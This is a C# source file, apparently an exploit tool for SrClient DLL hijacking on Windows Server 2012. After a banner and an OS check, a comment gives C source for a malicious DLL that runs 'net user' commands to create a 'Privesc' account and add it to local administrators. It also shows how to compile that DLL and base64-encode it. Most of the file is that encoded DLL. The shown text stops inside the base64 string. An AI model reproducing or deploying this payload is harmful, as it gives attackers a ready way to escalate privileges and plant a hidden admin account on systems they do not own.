using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Security.AccessControl;
using System.Security.Principal;

// https://blog.vonahi.io/srclient-dll-hijacking/?test=test

namespace SrClient
{
    class Program
    {
        static void Main(string[] args)
        {

            PrintBanner();

            if (!CheckOS())
            {
                PrintRed("[-] Server is not Windows Server 2012 x64");
                Console.ResetColor();
                Console.WriteLine();
                return;
            }

            /* DLL to create user Privesc / Pr!v35c with local admin privileges
            
            $ cat cmd.c

            #include <windows.h>
            BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
                if (dwReason == DLL_PROCESS_ATTACH){
                    WinExec("cmd.exe /c net user Privesc Pr!v35c /add", 0);
                    WinExec("cmd.exe /c net localgroup administrators Privesc /add", 0);
                    ExitProcess(0);
                }
                return TRUE;
            }
 
            $ x86_64-w64-mingw32-gcc cmd.c -shared -s -Os -o cmd.dll
            $ base64 -w 0 cmd.dll

            */

            string cmd = "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AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy7NmAAAAAAKIAAAAEAAAAAAAAAAAAAACiAAAAogAAAKIAAAGNtZC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8kAAAAAAAAAAAAABUkwAADJEAAJyQAAAAAAAAAAAAAJiTAABskQAAAAAAAAAAAAAAAAAAAAAAAAAAAADckQAAAAAAAPSRAAAAAAAADJIAAAAAAAAakgAAAAAAACqSAAAAAAAARpIAAAAAAABekgAAAAAAAGaSAAAAAAAAdJIAAAAAAACGkgAAAAAAAJaSAAAAAAAAAAAAAAAAAACgkgAAAAAAAK6SAAAAAAAAvJIAAAAAAADIkgAAAAAAANCSAAAAAAAA2pIAAAAAAADikgAAAAAAAOySAAAAAAAA9JIAAAAAAAD+kgAAAAAAAAiTAAAAAAAAEpMAAAAAAAAckwAAAAAAAAAAAAAAAAAA3JEAAAAAAAD0kQAAAAAAAAySAAAAAAAAGpIAAAAAAAAqkgAAAAAAAEaSAAAAAAAAXpIAAAAAAABmkgAAAAAAAHSSAAAAAAAAhpIAAAAAAACWkgAAAAAAAAAAAAAAAAAAoJIAAAAAAACukgAAAAAAALySAAAAAAAAyJIAAAAAAADQkgAAAAAAANqSAAAAAAAA4pIAAAAAAADskgAAAAAAAPSSAAAAAAAA/pIAAAAAAAAIkwAAAAAAABKTAAAAAAAAHJMAAAAAAAAAAAAAAAAAABsBRGVsZXRlQ3JpdGljYWxTZWN0aW9uAD8BRW50ZXJDcml0aWNhbFNlY3Rpb24AAG4BRXhpdFByb2Nlc3MAdgJHZXRMYXN0RXJyb3IAAHwDSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbgDYA0xlYXZlQ3JpdGljYWxTZWN0aW9uAACCBVNsZWVwAKUFVGxzR2V0VmFsdWUA1AVWaXJ0dWFsUHJvdGVjdAAA1gVWaXJ0dWFsUXVlcnkAAAwGV2luRXhlYwBUAF9faW9iX2Z1bmMAAHkAX2Ftc2dfZXhpdAAAHQFfaW5pdHRlcm0AgwFfbG9jawDKAl91bmxvY2sAigNhYm9ydACbA2NhbGxvYwAAwwNmcmVlAADQA2Z3cml0ZQAAHARyZWFsbG9jAD4Ec3RybGVuAABBBHN0cm5jbXAAYwR2ZnByaW50ZgAAAJAAAACQAAAAkAAAAJAAAACQAAAAkAAAAJAAAACQAAAAkAAAAJAAAACQAABLRVJORUwzMi5kbGwAAAAAFJAAABSQAAAUkAAAFJAAABSQAAAUkAAAFJAAABSQAAAUkAAAFJAAABSQAAAUkAAAFJAAAG1zdmNydC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCgcAAAAAAAAAAAAAAAAAAAAAAAAAAA4BSgcAAAAACwFKBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA